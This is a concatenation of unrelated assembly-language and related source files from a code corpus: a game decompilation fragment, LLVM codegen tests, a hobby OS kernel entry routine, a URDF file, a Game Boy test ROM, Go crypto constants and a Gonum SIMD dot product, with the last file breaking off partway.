/* 01B10 80A75E20 50A1005B */ beql $a1, $at, .L80A75F90
/* 01B14 80A75E24 8FBF0024 */ lw $ra, 0x0024($sp)
/* 01B18 80A75E28 0C00B2DD */ jal Flags_SetSwitch
/* 01B1C 80A75E2C 8FA40054 */ lw $a0, 0x0054($sp)
/* 01B20 80A75E30 10000057 */ beq $zero, $zero, .L80A75F90
/* 01B24 80A75E34 8FBF0024 */ lw $ra, 0x0024($sp)
.L80A75E38:
/* 01B28 80A75E38 24010032 */ addiu $at, $zero, 0x0032 ## $at = 00000032
/* 01B2C 80A75E3C 14610007 */ bne $v1, $at, .L80A75E5C
/* 01B30 80A75E40 AFA30030 */ sw $v1, 0x0030($sp)
/* 01B34 80A75E44 8FA40054 */ lw $a0, 0x0054($sp)
/* 01B38 80A75E48 02003025 */ or $a2, $s0, $zero ## $a2 = 00000000
/* 01B3C 80A75E4C 24070005 */ addiu $a3, $zero, 0x0005 ## $a3 = 00000005
/* 01B40 80A75E50 0C00CDD2 */ jal Actor_ChangeType
/* 01B44 80A75E54 24851C24 */ addiu $a1, $a0, 0x1C24 ## $a1 = 00001C24
/* 01B48 80A75E58 920200AF */ lbu $v0, 0x00AF($s0) ## 000000AF
.L80A75E5C:
/* 01B4C 80A75E5C 14400008 */ bne $v0, $zero, .L80A75E80
/* 01B50 80A75E60 26040032 */ addiu $a0, $s0, 0x0032 ## $a0 = 00000032
/* 01B54 80A75E64 0C29D663 */ jal func_80A7598C
/* 01B58 80A75E68 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01B5C 80A75E6C 8FA40054 */ lw $a0, 0x0054($sp)
/* 01B60 80A75E70 0C00CB1F */ jal func_80032C7C
/* 01B64 80A75E74 02002825 */ or $a1, $s0, $zero ## $a1 = 00000000
/* 01B68 80A75E78 10000045 */ beq $zero, $zero, .L80A75F90
/* 01B6C 80A75E7C 8FBF0024 */ lw $ra, 0x0024($sp)
.L80A75E80:
/* 01B70 80A75E80 8605008A */ lh $a1, 0x008A($s0) ## 0000008A
/* 01B74 80A75E84 AFA00010 */ sw $zero, 0x0010($sp)
/* 01B78 80A75E88 24060001 */ addiu $a2, $zero, 0x0001 ## $a2 = 00000001
/* 01B7C 80A75E8C 0C01E1A7 */ jal Math_SmoothScaleMaxMinS
/* 01B80 80A75E90 240707D0 */ addiu $a3, $zero, 0x07D0 ## $a3 = 000007D0
/* 01B84 80A75E94 8618001C */ lh $t8, 0x001C($s0) ## 0000001C
/* 01B88 80A75E98 57000019 */ bnel $t8, $zero, .L80A75F00
/* 01B8C 80A75E9C 8609001C */ lh $t1, 0x001C($s0) ## 0000001C
/* 01B90 80A75EA0 0C03F66B */ jal Math_Rand_ZeroOne
## Rand.Next() float
/* 01B94 80A75EA4 00000000 */ nop
/* 01B98 80A75EA8 3C013F00 */ lui $at, 0x3F00 ## $at = 3F000000
/* 01B9C 80A75EAC 44813000 */ mtc1 $at, $f6 ## $f6 = 0.50
/* 01BA0 80A75EB0 00000000 */ nop
/* 01BA4 80A75EB4 4606003C */ c.lt.s $f0, $f6
/* 01BA8 80A75EB8 00000000 */ nop
/* 01BAC 80A75EBC 45020010 */ bc1fl .L80A75F00
/* 01BB0 80A75EC0 8609001C */ lh $t1, 0x001C($s0) ## 0000001C
/* 01BB4 80A75EC4 8619008A */ lh $t9, 0x008A($s0) ## 0000008A
/* 01BB8 80A75EC8 860800B6 */ lh $t0, 0x00B6($s0) ## 000000B6
/* 01BBC 80A75ECC 03281023 */ subu $v0, $t9, $t0
/* 01BC0 80A75ED0 00021400 */ sll $v0, $v0, 16
/* 01BC4 80A75ED4 00021403 */ sra $v0, $v0, 16
/* 01BC8 80A75ED8 04400003 */ bltz $v0, .L80A75EE8
/* 01BCC 80A75EDC 00021823 */ subu $v1, $zero, $v0
/* 01BD0 80A75EE0 10000001 */ beq $zero, $zero, .L80A75EE8
/* 01BD4 80A75EE4 00401825 */ or $v1, $v0, $zero ## $v1 = 00000000
.L80A75EE8:
/* 01BD8 80A75EE8 28614001 */ slti $at, $v1, 0x4001
/* 01BDC 80A75EEC 54200004 */ bnel $at, $zero, .L80A75F00
/* 01BE0 80A75EF0 8609001C */ lh $t1, 0x001C($s0) ## 0000001C
/* 01BE4 80A75EF4 0C29D528 */ jal func_80A754A0
/* 01BE8 80A75EF8 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01BEC 80A75EFC 8609001C */ lh $t1, 0x001C($s0) ## 0000001C
.L80A75F00:
/* 01BF0 80A75F00 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01BF4 80A75F04 11200019 */ beq $t1, $zero, .L80A75F6C
/* 01BF8 80A75F08 00000000 */ nop
/* 01BFC 80A75F0C 920A02FB */ lbu $t2, 0x02FB($s0) ## 000002FB
/* 01C00 80A75F10 8FAB0030 */ lw $t3, 0x0030($sp)
/* 01C04 80A75F14 11400015 */ beq $t2, $zero, .L80A75F6C
/* 01C08 80A75F18 2961000B */ slti $at, $t3, 0x000B
/* 01C0C 80A75F1C 1420000A */ bne $at, $zero, .L80A75F48
/* 01C10 80A75F20 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01C14 80A75F24 920C00AF */ lbu $t4, 0x00AF($s0) ## 000000AF
/* 01C18 80A75F28 2405392C */ addiu $a1, $zero, 0x392C ## $a1 = 0000392C
/* 01C1C 80A75F2C 2981000B */ slti $at, $t4, 0x000B
/* 01C20 80A75F30 10200005 */ beq $at, $zero, .L80A75F48
/* 01C24 80A75F34 00000000 */ nop
/* 01C28 80A75F38 0C00BE0A */ jal Audio_PlayActorSound2
/* 01C2C 80A75F3C 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01C30 80A75F40 10000006 */ beq $zero, $zero, .L80A75F5C
/* 01C34 80A75F44 00000000 */ nop
.L80A75F48:
/* 01C38 80A75F48 0C00BE0A */ jal Audio_PlayActorSound2
/* 01C3C 80A75F4C 240539BE */ addiu $a1, $zero, 0x39BE ## $a1 = 000039BE
/* 01C40 80A75F50 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01C44 80A75F54 0C00BE0A */ jal Audio_PlayActorSound2
/* 01C48 80A75F58 2405393B */ addiu $a1, $zero, 0x393B ## $a1 = 0000393B
.L80A75F5C:
/* 01C4C 80A75F5C 0C29D5E4 */ jal func_80A75790
/* 01C50 80A75F60 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01C54 80A75F64 1000000A */ beq $zero, $zero, .L80A75F90
/* 01C58 80A75F68 8FBF0024 */ lw $ra, 0x0024($sp)
.L80A75F6C:
/* 01C5C 80A75F6C 0C00BE0A */ jal Audio_PlayActorSound2
/* 01C60 80A75F70 2405393A */ addiu $a1, $zero, 0x393A ## $a1 = 0000393A
/* 01C64 80A75F74 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01C68 80A75F78 0C00BE0A */ jal Audio_PlayActorSound2
/* 01C6C 80A75F7C 240539BE */ addiu $a1, $zero, 0x39BE ## $a1 = 000039BE
/* 01C70 80A75F80 8FA40054 */ lw $a0, 0x0054($sp)
/* 01C74 80A75F84 0C018B35 */ jal func_80062CD4
/* 01C78 80A75F88 27A50038 */ addiu $a1, $sp, 0x0038 ## $a1 = FFFFFFE8
.L80A75F8C:
/* 01C7C 80A75F8C 8FBF0024 */ lw $ra, 0x0024($sp)
.L80A75F90:
/* 01C80 80A75F90 8FB00020 */ lw $s0, 0x0020($sp)
/* 01C84 80A75F94 27BD0050 */ addiu $sp, $sp, 0x0050 ## $sp = 00000000
/* 01C88 80A75F98 03E00008 */ jr $ra
/* 01C8C 80A75F9C 00000000 */ nop
| {
"language": "Assembly"
} |
; RUN: llc < %s -O0 -fast-isel-abort -mtriple=armv7-apple-darwin | FileCheck %s --check-prefix=DARWIN-ARM
; RUN: llc < %s -O0 -fast-isel-abort -mtriple=armv7-linux-gnueabi | FileCheck %s --check-prefix=LINUX-ARM
; RUN: llc < %s -O0 -fast-isel-abort -mtriple=thumbv7-apple-darwin | FileCheck %s --check-prefix=DARWIN-THUMB2
; RUN: llc < %s -O0 -fast-isel-abort -mtriple=thumbv7-linux-gnueabi | FileCheck %s --check-prefix=LINUX-THUMB2
define i8* @frameaddr_index0() nounwind {
entry:
; DARWIN-ARM: frameaddr_index0:
; DARWIN-ARM: push {r7}
; DARWIN-ARM: mov r7, sp
; DARWIN-ARM: mov r0, r7
; DARWIN-THUMB2: frameaddr_index0:
; DARWIN-THUMB2: str r7, [sp, #-4]!
; DARWIN-THUMB2: mov r7, sp
; DARWIN-THUMB2: mov r0, r7
; LINUX-ARM: frameaddr_index0:
; LINUX-ARM: push {r11}
; LINUX-ARM: mov r11, sp
; LINUX-ARM: mov r0, r11
; LINUX-THUMB2: frameaddr_index0:
; LINUX-THUMB2: str r7, [sp, #-4]!
; LINUX-THUMB2: mov r7, sp
; LINUX-THUMB2: mov r0, r7
%0 = call i8* @llvm.frameaddress(i32 0)
ret i8* %0
}
define i8* @frameaddr_index1() nounwind {
entry:
; DARWIN-ARM: frameaddr_index1:
; DARWIN-ARM: push {r7}
; DARWIN-ARM: mov r7, sp
; DARWIN-ARM: mov r0, r7
; DARWIN-ARM: ldr r0, [r0]
; DARWIN-THUMB2: frameaddr_index1:
; DARWIN-THUMB2: str r7, [sp, #-4]!
; DARWIN-THUMB2: mov r7, sp
; DARWIN-THUMB2: mov r0, r7
; DARWIN-THUMB2: ldr r0, [r0]
; LINUX-ARM: frameaddr_index1:
; LINUX-ARM: push {r11}
; LINUX-ARM: mov r11, sp
; LINUX-ARM: mov r0, r11
; LINUX-ARM: ldr r0, [r0]
; LINUX-THUMB2: frameaddr_index1:
; LINUX-THUMB2: str r7, [sp, #-4]!
; LINUX-THUMB2: mov r7, sp
; LINUX-THUMB2: mov r0, r7
; LINUX-THUMB2: ldr r0, [r0]
%0 = call i8* @llvm.frameaddress(i32 1)
ret i8* %0
}
define i8* @frameaddr_index3() nounwind {
entry:
; DARWIN-ARM: frameaddr_index3:
; DARWIN-ARM: push {r7}
; DARWIN-ARM: mov r7, sp
; DARWIN-ARM: mov r0, r7
; DARWIN-ARM: ldr r0, [r0]
; DARWIN-ARM: ldr r0, [r0]
; DARWIN-ARM: ldr r0, [r0]
; DARWIN-THUMB2: frameaddr_index3:
; DARWIN-THUMB2: str r7, [sp, #-4]!
; DARWIN-THUMB2: mov r7, sp
; DARWIN-THUMB2: mov r0, r7
; DARWIN-THUMB2: ldr r0, [r0]
; DARWIN-THUMB2: ldr r0, [r0]
; DARWIN-THUMB2: ldr r0, [r0]
; LINUX-ARM: frameaddr_index3:
; LINUX-ARM: push {r11}
; LINUX-ARM: mov r11, sp
; LINUX-ARM: mov r0, r11
; LINUX-ARM: ldr r0, [r0]
; LINUX-ARM: ldr r0, [r0]
; LINUX-ARM: ldr r0, [r0]
; LINUX-THUMB2: frameaddr_index3:
; LINUX-THUMB2: str r7, [sp, #-4]!
; LINUX-THUMB2: mov r7, sp
; LINUX-THUMB2: mov r0, r7
; LINUX-THUMB2: ldr r0, [r0]
; LINUX-THUMB2: ldr r0, [r0]
; LINUX-THUMB2: ldr r0, [r0]
%0 = call i8* @llvm.frameaddress(i32 3)
ret i8* %0
}
declare i8* @llvm.frameaddress(i32) nounwind readnone
| {
"language": "Assembly"
} |
; RUN: llc -march=mips64 -relocation-model=static -soft-float -mattr=-n64,+n32 < %s | FileCheck --check-prefix=ALL --check-prefix=SYM32 %s
; RUN: llc -march=mips64el -relocation-model=static -soft-float -mattr=-n64,+n32 < %s | FileCheck --check-prefix=ALL --check-prefix=SYM32 %s
; RUN: llc -march=mips64 -relocation-model=static -soft-float -mattr=-n64,+n64 < %s | FileCheck --check-prefix=ALL --check-prefix=SYM64 %s
; RUN: llc -march=mips64el -relocation-model=static -soft-float -mattr=-n64,+n64 < %s | FileCheck --check-prefix=ALL --check-prefix=SYM64 %s
; Test the fp128 arguments for all ABI's and byte orders as specified
; by section 2 of the MIPSpro N32 Handbook.
;
; O32 is not tested because long double is the same as double on O32.
@ldoubles = global [11 x fp128] zeroinitializer
define void @ldouble_args(fp128 %a, fp128 %b, fp128 %c, fp128 %d, fp128 %e) nounwind {
entry:
%0 = getelementptr [11 x fp128]* @ldoubles, i32 0, i32 1
store volatile fp128 %a, fp128* %0
%1 = getelementptr [11 x fp128]* @ldoubles, i32 0, i32 2
store volatile fp128 %b, fp128* %1
%2 = getelementptr [11 x fp128]* @ldoubles, i32 0, i32 3
store volatile fp128 %c, fp128* %2
%3 = getelementptr [11 x fp128]* @ldoubles, i32 0, i32 4
store volatile fp128 %d, fp128* %3
%4 = getelementptr [11 x fp128]* @ldoubles, i32 0, i32 5
store volatile fp128 %e, fp128* %4
ret void
}
; ALL-LABEL: ldouble_args:
; We won't test the way the global address is calculated in this test. This is
; just to get the register number for the other checks.
; SYM32-DAG: addiu [[R2:\$[0-9]+]], ${{[0-9]+}}, %lo(ldoubles)
; SYM64-DAG: ld [[R2:\$[0-9]]], %got_disp(ldoubles)(
; The first four arguments are the same in N32/N64.
; The first argument is floating point but soft-float is enabled so floating
; point registers are not used.
; ALL-DAG: sd $4, 16([[R2]])
; ALL-DAG: sd $5, 24([[R2]])
; ALL-DAG: sd $6, 32([[R2]])
; ALL-DAG: sd $7, 40([[R2]])
; ALL-DAG: sd $8, 48([[R2]])
; ALL-DAG: sd $9, 56([[R2]])
; ALL-DAG: sd $10, 64([[R2]])
; ALL-DAG: sd $11, 72([[R2]])
; N32/N64 have run out of registers and starts using the stack too
; ALL-DAG: ld [[R3:\$[0-9]+]], 0($sp)
; ALL-DAG: ld [[R4:\$[0-9]+]], 8($sp)
; ALL-DAG: sd [[R3]], 80([[R2]])
; ALL-DAG: sd [[R4]], 88([[R2]])
| {
"language": "Assembly"
} |
/***************************************************
* 版权声明
*
* 本操作系统名为:MINE
* 该操作系统未经授权不得以盈利或非盈利为目的进行开发,
* 只允许个人学习以及公开交流使用
*
* 代码最终所有权及解释权归田宇所有;
*
* 本模块作者: 田宇
* EMail: [email protected]
*
*
***************************************************/
.section .text
.globl _start
_start:
mov $0x10, %ax
mov %ax, %ds
mov %ax, %es
mov %ax, %fs
mov %ax, %ss
mov $0x7E00, %esp
//======= load GDTR
lgdt GDT_POINTER(%rip)
//======= load IDTR
lidt IDT_POINTER(%rip)
mov $0x10, %ax
mov %ax, %ds
mov %ax, %es
mov %ax, %fs
mov %ax, %gs
mov %ax, %ss
movq $0x7E00, %rsp
//======= load cr3
movq $0x101000, %rax
movq %rax, %cr3
movq switch_seg(%rip), %rax
pushq $0x08
pushq %rax
lretq
//======= 64-bit mode code
switch_seg:
.quad entry64
entry64:
movq $0x10, %rax
movq %rax, %ds
movq %rax, %es
movq %rax, %gs
movq %rax, %ss
movq $0xffff800000007E00, %rsp /* rsp address */
setup_IDT:
leaq ignore_int(%rip), %rdx
movq $(0x08 << 16), %rax
movw %dx, %ax
movq $(0x8E00 << 32), %rcx
addq %rcx, %rax
movl %edx, %ecx
shrl $16, %ecx
shlq $48, %rcx
addq %rcx, %rax
shrq $32, %rdx
leaq IDT_Table(%rip), %rdi
mov $256, %rcx
rp_sidt:
movq %rax, (%rdi)
movq %rdx, 8(%rdi)
addq $0x10, %rdi
dec %rcx
jne rp_sidt
setup_TSS64:
leaq TSS64_Table(%rip), %rdx
xorq %rax, %rax
xorq %rcx, %rcx
movq $0x89, %rax
shlq $40, %rax
movl %edx, %ecx
shrl $24, %ecx
shlq $56, %rcx
addq %rcx, %rax
xorq %rcx, %rcx
movl %edx, %ecx
andl $0xffffff, %ecx
shlq $16, %rcx
addq %rcx, %rax
addq $103, %rax
leaq GDT_Table(%rip), %rdi
movq %rax, 64(%rdi)
shrq $32, %rdx
movq %rdx, 72(%rdi)
mov $0x40, %ax
ltr %ax
movq go_to_kernel(%rip), %rax /* movq address */
pushq $0x08
pushq %rax
lretq
go_to_kernel:
.quad Start_Kernel
//======= ignore_int
ignore_int:
cld
pushq %rax
pushq %rbx
pushq %rcx
pushq %rdx
pushq %rbp
pushq %rdi
pushq %rsi
pushq %r8
pushq %r9
pushq %r10
pushq %r11
pushq %r12
pushq %r13
pushq %r14
pushq %r15
movq %es, %rax
pushq %rax
movq %ds, %rax
pushq %rax
movq $0x10, %rax
movq %rax, %ds
movq %rax, %es
leaq int_msg(%rip), %rax /* leaq get address */
pushq %rax
movq %rax, %rdx
movq $0x00000000, %rsi
movq $0x00ff0000, %rdi
movq $0, %rax
callq color_printk
addq $0x8, %rsp
Loop:
jmp Loop
popq %rax
movq %rax, %ds
popq %rax
movq %rax, %es
popq %r15
popq %r14
popq %r13
popq %r12
popq %r11
popq %r10
popq %r9
popq %r8
popq %rsi
popq %rdi
popq %rbp
popq %rdx
popq %rcx
popq %rbx
popq %rax
iretq
int_msg:
.asciz "Unknown interrupt or fault at RIP\n"
//======= init page
.align 8
.org 0x1000
__PML4E:
.quad 0x102007
.fill 255,8,0
.quad 0x102007
.fill 255,8,0
.org 0x2000
__PDPTE:
.quad 0x103003
.fill 511,8,0
.org 0x3000
__PDE:
.quad 0x000083
.quad 0x200083
.quad 0x400083
.quad 0x600083
.quad 0x800083
.quad 0xe0000083 /*0x a00000*/
.quad 0xe0200083
.quad 0xe0400083
.quad 0xe0600083
.quad 0xe0800083 /*0x1000000*/
.quad 0xe0a00083
.quad 0xe0c00083
.quad 0xe0e00083
.fill 499,8,0
//======= GDT_Table
.section .data
.globl GDT_Table
GDT_Table:
.quad 0x0000000000000000 /*0 NULL descriptor 00*/
.quad 0x0020980000000000 /*1 KERNEL Code 64-bit Segment 08*/
.quad 0x0000920000000000 /*2 KERNEL Data 64-bit Segment 10*/
.quad 0x0020f80000000000 /*3 USER Code 64-bit Segment 18*/
.quad 0x0000f20000000000 /*4 USER Data 64-bit Segment 20*/
.quad 0x00cf9a000000ffff /*5 KERNEL Code 32-bit Segment 28*/
.quad 0x00cf92000000ffff /*6 KERNEL Data 32-bit Segment 30*/
.fill 10,8,0 /*8 ~ 9 TSS (jmp one segment <7>) in long-mode 128-bit 40*/
GDT_END:
GDT_POINTER:
GDT_LIMIT: .word GDT_END - GDT_Table - 1
GDT_BASE: .quad GDT_Table
//======= IDT_Table
.globl IDT_Table
IDT_Table:
.fill 512,8,0
IDT_END:
IDT_POINTER:
IDT_LIMIT: .word IDT_END - IDT_Table - 1
IDT_BASE: .quad IDT_Table
//======= TSS64_Table
.globl TSS64_Table
TSS64_Table:
.fill 13,8,0
TSS64_END:
TSS64_POINTER:
TSS64_LIMIT: .word TSS64_END - TSS64_Table - 1
TSS64_BASE: .quad TSS64_Table
| {
"language": "Assembly"
} |
<robot name="blob838">
<link name="random_obj_838">
<contact>
<lateral_friction value="1.0"/>
<rolling_friction value="0.0"/>
<inertia_scaling value="3.0"/>
<contact_cfm value="0.0"/>
<contact_erp value="1.0"/>
</contact>
<inertial>
<origin rpy="0 0 0" xyz="0 0 0"/>
<mass value="0.1"/>
<inertia ixx="1" ixy="0" ixz="0" iyy="1" iyz="0" izz="0"/>
</inertial>
<visual>
<origin rpy="0 0 0" xyz="0 0 0"/>
<geometry>
<mesh filename="838.obj" scale="0.015 0.015 0.015"/>
</geometry>
<material name="blockmat">
<color rgba="0.97 0.82 0.57 1"/>
</material>
</visual>
<collision>
<origin rpy="0 0 0" xyz="0 0 0"/>
<geometry>
<mesh filename="838.obj" scale="0.015 0.015 0.015"/>
</geometry>
</collision>
</link>
</robot>
| {
"language": "Assembly"
} |
.size 8000
.text@48
jp lstatint
.text@100
jp lbegin
.data@143
80
.text@150
lbegin:
ld a, 03
ldff(43), a
ld c, 41
ld b, 03
lbegin_waitm3:
ldff a, (c)
and a, b
cmp a, b
jrnz lbegin_waitm3
ld a, 20
ldff(c), a
xor a, a
ldff(0f), a
ld a, 02
ldff(ff), a
ei
.text@1000
lstatint:
ld a, 08
ldff(c), a
.text@1036
halt
.text@1067
ldff a, (c)
and a, 07
jp lprint_a
.text@7000
lprint_a:
push af
ld b, 91
call lwaitly_b
xor a, a
ldff(40), a
pop af
ld(9800), a
ld bc, 7a00
ld hl, 8000
ld d, a0
lprint_copytiles:
ld a, (bc)
inc bc
ld(hl++), a
dec d
jrnz lprint_copytiles
ld a, c0
ldff(47), a
ld a, 80
ldff(68), a
ld a, ff
ldff(69), a
ldff(69), a
ldff(69), a
ldff(69), a
ldff(69), a
ldff(69), a
xor a, a
ldff(69), a
ldff(69), a
ldff(43), a
ld a, 91
ldff(40), a
lprint_limbo:
jr lprint_limbo
.text@7400
lwaitly_b:
ld c, 44
lwaitly_b_loop:
ldff a, (c)
cmp a, b
jrnz lwaitly_b_loop
ret
.data@7a00
00 00 7f 7f 41 41 41 41
41 41 41 41 41 41 7f 7f
00 00 08 08 08 08 08 08
08 08 08 08 08 08 08 08
00 00 7f 7f 01 01 01 01
7f 7f 40 40 40 40 7f 7f
00 00 7f 7f 01 01 01 01
3f 3f 01 01 01 01 7f 7f
00 00 41 41 41 41 41 41
7f 7f 01 01 01 01 01 01
00 00 7f 7f 40 40 40 40
7e 7e 01 01 01 01 7e 7e
00 00 7f 7f 40 40 40 40
7f 7f 41 41 41 41 7f 7f
00 00 7f 7f 01 01 02 02
04 04 08 08 10 10 10 10
00 00 3e 3e 41 41 41 41
3e 3e 41 41 41 41 3e 3e
00 00 7f 7f 41 41 41 41
7f 7f 01 01 01 01 7f 7f
| {
"language": "Assembly"
} |
// Copyright 2012 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// This code was translated into a form compatible with 6a from the public
// domain sources in SUPERCOP: https://bench.cr.yp.to/supercop.html
// +build amd64,!gccgo,!appengine
// These constants cannot be encoded in non-MOVQ immediates.
// We access them directly from memory instead.
DATA ·_121666_213(SB)/8, $996687872
GLOBL ·_121666_213(SB), 8, $8
DATA ·_2P0(SB)/8, $0xFFFFFFFFFFFDA
GLOBL ·_2P0(SB), 8, $8
DATA ·_2P1234(SB)/8, $0xFFFFFFFFFFFFE
GLOBL ·_2P1234(SB), 8, $8
| {
"language": "Assembly"
} |
// Copyright ©2016 The Gonum Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !noasm,!appengine,!safe
#include "textflag.h"
#define MOVDDUP_XPTR_IDX_8__X3 LONG $0x1C120FF2; BYTE $0xC6 // MOVDDUP (SI)(AX*8), X3
#define MOVDDUP_16_XPTR_IDX_8__X5 LONG $0x6C120FF2; WORD $0x10C6 // MOVDDUP 16(SI)(AX*8), X5
#define MOVDDUP_32_XPTR_IDX_8__X7 LONG $0x7C120FF2; WORD $0x20C6 // MOVDDUP 32(SI)(AX*8), X7
#define MOVDDUP_48_XPTR_IDX_8__X9 LONG $0x120F44F2; WORD $0xC64C; BYTE $0x30 // MOVDDUP 48(SI)(AX*8), X9
#define MOVDDUP_XPTR_IIDX_8__X2 LONG $0x14120FF2; BYTE $0xD6 // MOVDDUP (SI)(DX*8), X2
#define MOVDDUP_16_XPTR_IIDX_8__X4 LONG $0x64120FF2; WORD $0x10D6 // MOVDDUP 16(SI)(DX*8), X4
#define MOVDDUP_32_XPTR_IIDX_8__X6 LONG $0x74120FF2; WORD $0x20D6 // MOVDDUP 32(SI)(DX*8), X6
#define MOVDDUP_48_XPTR_IIDX_8__X8 LONG $0x120F44F2; WORD $0xD644; BYTE $0x30 // MOVDDUP 48(SI)(DX*8), X8
#define ADDSUBPD_X2_X3 LONG $0xDAD00F66 // ADDSUBPD X2, X3
#define ADDSUBPD_X4_X5 LONG $0xECD00F66 // ADDSUBPD X4, X5
#define ADDSUBPD_X6_X7 LONG $0xFED00F66 // ADDSUBPD X6, X7
#define ADDSUBPD_X8_X9 LONG $0xD00F4566; BYTE $0xC8 // ADDSUBPD X8, X9
#define X_PTR SI
#define Y_PTR DI
#define LEN CX
#define TAIL BX
#define SUM X0
#define P_SUM X1
#define IDX AX
#define I_IDX DX
#define NEG1 X15
#define P_NEG1 X14
// func DotcUnitary(x, y []complex128) (sum complex128)
TEXT ·DotcUnitary(SB), NOSPLIT, $0
MOVQ x_base+0(FP), X_PTR // X_PTR = &x
MOVQ y_base+24(FP), Y_PTR // Y_PTR = &y
MOVQ x_len+8(FP), LEN // LEN = min( len(x), len(y) )
CMPQ y_len+32(FP), LEN
CMOVQLE y_len+32(FP), LEN
PXOR SUM, SUM // sum = 0
CMPQ LEN, $0 // if LEN == 0 { return }
JE dot_end
XORPS P_SUM, P_SUM // psum = 0
MOVSD $(-1.0), NEG1
SHUFPD $0, NEG1, NEG1 // { -1, -1 }
XORQ IDX, IDX // i := 0
MOVQ $1, I_IDX // j := 1
MOVQ LEN, TAIL
ANDQ $3, TAIL // TAIL = floor( TAIL / 4 )
SHRQ $2, LEN // LEN = TAIL % 4
JZ dot_tail // if LEN == 0 { goto dot_tail }
MOVAPS NEG1, P_NEG1 // Copy NEG1 to P_NEG1 for pipelining
dot_loop: // do {
MOVDDUP_XPTR_IDX_8__X3 // X_(i+1) = { real(x[i], real(x[i]) }
MOVDDUP_16_XPTR_IDX_8__X5
MOVDDUP_32_XPTR_IDX_8__X7
MOVDDUP_48_XPTR_IDX_8__X9
MOVDDUP_XPTR_IIDX_8__X2 // X_i = { imag(x[i]), imag(x[i]) }
MOVDDUP_16_XPTR_IIDX_8__X4
MOVDDUP_32_XPTR_IIDX_8__X6
MOVDDUP_48_XPTR_IIDX_8__X8
// X_i = { -imag(x[i]), -imag(x[i]) }
MULPD NEG1, X2
MULPD P_NEG1, X4
MULPD NEG1, X6
MULPD P_NEG1, X8
// X_j = { imag(y[i]), real(y[i]) }
MOVUPS (Y_PTR)(IDX*8), X10
MOVUPS 16(Y_PTR)(IDX*8), X11
MOVUPS 32(Y_PTR)(IDX*8), X12
MOVUPS 48(Y_PTR)(IDX*8), X13
// X_(i+1) = { imag(a) * real(x[i]), real(a) * real(x[i]) }
MULPD X10, X3
MULPD X11, X5
MULPD X12, X7
MULPD X13, X9
// X_j = { real(y[i]), imag(y[i]) }
SHUFPD $0x1, X10, X10
SHUFPD $0x1, X11, X11
SHUFPD $0x1, X12, X12
SHUFPD $0x1, X13, X13
// X_i = { real(a) * imag(x[i]), imag(a) * imag(x[i]) }
MULPD X10, X2
MULPD X11, X4
MULPD X12, X6
MULPD X13, X8
// X_(i+1) = {
// imag(result[i]): imag(a)*real(x[i]) + real(a)*imag(x[i]),
// real(result[i]): real(a)*real(x[i]) - imag(a)*imag(x[i])
// }
ADDSUBPD_X2_X3
ADDSUBPD_X4_X5
ADDSUBPD_X6_X7
ADDSUBPD_X8_X9
// psum += result[i]
ADDPD X3, SUM
ADDPD X5, P_SUM
ADDPD X7, SUM
ADDPD X9, P_SUM
ADDQ $8, IDX // IDX += 8
ADDQ $8, I_IDX // I_IDX += 8
DECQ LEN
JNZ dot_loop // } while --LEN > 0
ADDPD P_SUM, SUM // sum += psum
CMPQ TAIL, $0 // if TAIL == 0 { return }
JE dot_end
dot_tail: // do {
MOVDDUP_XPTR_IDX_8__X3 // X_(i+1) = { real(x[i]) , real(x[i]) }
MOVDDUP_XPTR_IIDX_8__X2 // X_i = { imag(x[i]) , imag(x[i]) }
MULPD NEG1, X2 // X_i = { -imag(x[i]) , -imag(x[i]) }
MOVUPS (Y_PTR)(IDX*8), X10 // X_j = { imag(y[i]) , real(y[i]) }
MULPD X10, X3 // X_(i+1) = { imag(a) * real(x[i]), real(a) * real(x[i]) }
SHUFPD $0x1, X10, X10 // X_j = { real(y[i]) , imag(y[i]) }
MULPD X10, X2 // X_i = { real(a) * imag(x[i]), imag(a) * imag(x[i]) }
// X_(i+1) = {
// imag(result[i]): imag(a)*real(x[i]) + real(a)*imag(x[i]),
// real(result[i]): real(a)*real(x[i]) - imag(a)*imag(x[i])
// }
ADDSUBPD_X2_X3
ADDPD X3, SUM // SUM += result[i]
ADDQ $2, IDX // IDX += 2
ADDQ $2, I_IDX // I_IDX += 2
DECQ TAIL
JNZ dot_tail // } while --TAIL > 0
dot_end:
MOVUPS SUM, sum+48(FP)
RET
| {
"language": "Assembly"
} |
;/*
; Copyright (C) 2014 Apple Inc. All rights reserved.
;
; Redistribution and use in source and binary forms, with or without
; modification, are permitted provided that the following conditions
; are met:
; 1. Redistributions of source code must retain the above copyright
; notice, this list of conditions and the following disclaimer.
; 2. Redistributions in binary form must reproduce the above copyright
; notice, this list of conditions and the following disclaimer in the
; documentation and/or other materials provided with the distribution.
;
; THIS SOFTWARE IS PROVIDED BY APPLE INC. ``AS IS'' AND ANY
; EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
; IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
; PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR
; CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
; EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
; PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
; PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
; OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
; (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
; OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
;*/
EXTERN getHostCallReturnValueWithExecState : near
PUBLIC getHostCallReturnValue
PUBLIC ctiMasmProbeTrampoline
_TEXT SEGMENT
getHostCallReturnValue PROC
lea rcx, [rsp - 8]
